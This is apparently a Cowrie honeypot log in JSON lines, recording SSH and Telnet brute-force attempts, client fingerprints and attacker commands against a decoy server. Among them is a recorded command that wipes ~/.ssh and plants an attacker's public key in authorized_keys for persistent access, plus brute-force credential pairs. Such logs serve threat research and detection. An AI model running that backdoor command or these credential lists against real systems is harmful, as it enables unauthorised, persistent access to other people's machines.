{"eventid":"cowrie.session.closed","duration":"66.3","message":"Connection lost after 66.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:20.236025Z","src_ip":"212.227.125.160","session":"939c320a7e13"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234567","message":"login attempt [user/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:48:23.793607Z","src_ip":"212.227.235.229","session":"6fa7f57181b6"}
{"eventid":"cowrie.login.success","username":"root","password":"solu","message":"login attempt [root/solu] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:48:24.965389Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:25.669022Z","src_ip":"212.227.235.229","session":"6fa7f57181b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:48:28.387597Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T06:48:28.388488Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:29.423426Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:29.424650Z","src_ip":"201.148.180.50","session":"178ccddc0a8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39696,"dst_ip":"1.2.3.4","dst_port":23,"session":"d47eea0bb9b8","protocol":"telnet","message":"New connection: 212.227.125.160:39696 (1.2.3.4:23) [session: d47eea0bb9b8]","sensor":"my-vps","timestamp":"2025-08-31T06:48:30.648481Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14950,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84e747bab41","protocol":"ssh","message":"New connection: 212.227.235.229:14950 (1.2.3.4:22) [session: b84e747bab41]","sensor":"my-vps","timestamp":"2025-08-31T06:48:33.927604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:48:33.929360Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:48:34.148499Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa88888888","message":"login attempt [root/Aa88888888] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:48:35.019027Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:48:35.477307Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:48:35.478089Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:48:35.479168Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:35.698404Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59780,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa9037473e40","protocol":"ssh","message":"New connection: 212.227.125.160:59780 (1.2.3.4:22) [session: fa9037473e40]","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.145960Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:48:36.192430Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.193223Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.413515Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.414334Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21680,"dst_ip":"1.2.3.4","dst_port":22,"session":"21d3a294137d","protocol":"ssh","message":"New connection: 212.227.235.229:21680 (1.2.3.4:22) [session: 21d3a294137d]","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.627503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.628553Z","src_ip":"212.227.235.229","session":"21d3a294137d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:48:36.844870Z","src_ip":"212.227.235.229","session":"21d3a294137d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:48:37.703196Z","src_ip":"212.227.235.229","session":"21d3a294137d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57006,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a261243d2df","protocol":"ssh","message":"New connection: 212.227.125.160:57006 (1.2.3.4:22) [session: 3a261243d2df]","sensor":"my-vps","timestamp":"2025-08-31T06:48:38.054885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:48:38.618311Z","src_ip":"212.227.125.160","session":"3a261243d2df"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:48:38.619006Z","src_ip":"212.227.125.160","session":"3a261243d2df"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:38.920090Z","src_ip":"212.227.235.229","session":"21d3a294137d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15499,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0c389ea23d","protocol":"ssh","message":"New connection: 212.227.235.229:15499 (1.2.3.4:22) [session: ec0c389ea23d]","sensor":"my-vps","timestamp":"2025-08-31T06:48:39.136486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:48:39.140384Z","src_ip":"212.227.235.229","session":"ec0c389ea23d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:48:39.357163Z","src_ip":"212.227.235.229","session":"ec0c389ea23d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:48:40.230829Z","src_ip":"212.227.235.229","session":"ec0c389ea23d"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:40.449777Z","src_ip":"212.227.235.229","session":"b84e747bab41"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:40.450736Z","src_ip":"212.227.235.229","session":"ec0c389ea23d"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234567","message":"login attempt [user/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:48:41.373322Z","src_ip":"212.227.125.160","session":"3a261243d2df"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:42.891662Z","src_ip":"212.227.125.160","session":"3a261243d2df"}
{"eventid":"cowrie.session.closed","duration":13.381981372833252,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:48:44.030364Z","src_ip":"212.227.125.160","session":"d47eea0bb9b8"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-31T06:48:45.499735Z","src_ip":"212.227.235.229","session":"7b0cfec0cef8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32774,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ccc8568f57f","protocol":"ssh","message":"New connection: 212.227.235.229:32774 (1.2.3.4:22) [session: 7ccc8568f57f]","sensor":"my-vps","timestamp":"2025-08-31T06:48:55.213148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:48:55.400971Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:48:55.510901Z","src_ip":"212.227.125.160","session":"fa9037473e40"}
{"eventid":"cowrie.session.closed","duration":"79.4","message":"Connection lost after 79.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:49:06.568208Z","src_ip":"212.227.235.229","session":"7b0cfec0cef8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:49:14.742166Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:49:14.891330Z","src_ip":"212.227.235.229","session":"7ccc8568f57f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45432,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4787bd44c33","protocol":"ssh","message":"New connection: 212.227.235.229:45432 (1.2.3.4:22) [session: c4787bd44c33]","sensor":"my-vps","timestamp":"2025-08-31T06:49:16.441074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:49:17.174087Z","src_ip":"212.227.235.229","session":"c4787bd44c33"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:49:17.174781Z","src_ip":"212.227.235.229","session":"c4787bd44c33"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345678","message":"login attempt [user/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:49:22.217413Z","src_ip":"212.227.235.229","session":"c4787bd44c33"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:49:24.077889Z","src_ip":"212.227.235.229","session":"c4787bd44c33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35398,"dst_ip":"1.2.3.4","dst_port":22,"session":"c70a0729cc1f","protocol":"ssh","message":"New connection: 212.227.125.160:35398 (1.2.3.4:22) [session: c70a0729cc1f]","sensor":"my-vps","timestamp":"2025-08-31T06:49:37.657895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:49:38.067355Z","src_ip":"212.227.125.160","session":"c70a0729cc1f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:49:38.068122Z","src_ip":"212.227.125.160","session":"c70a0729cc1f"}
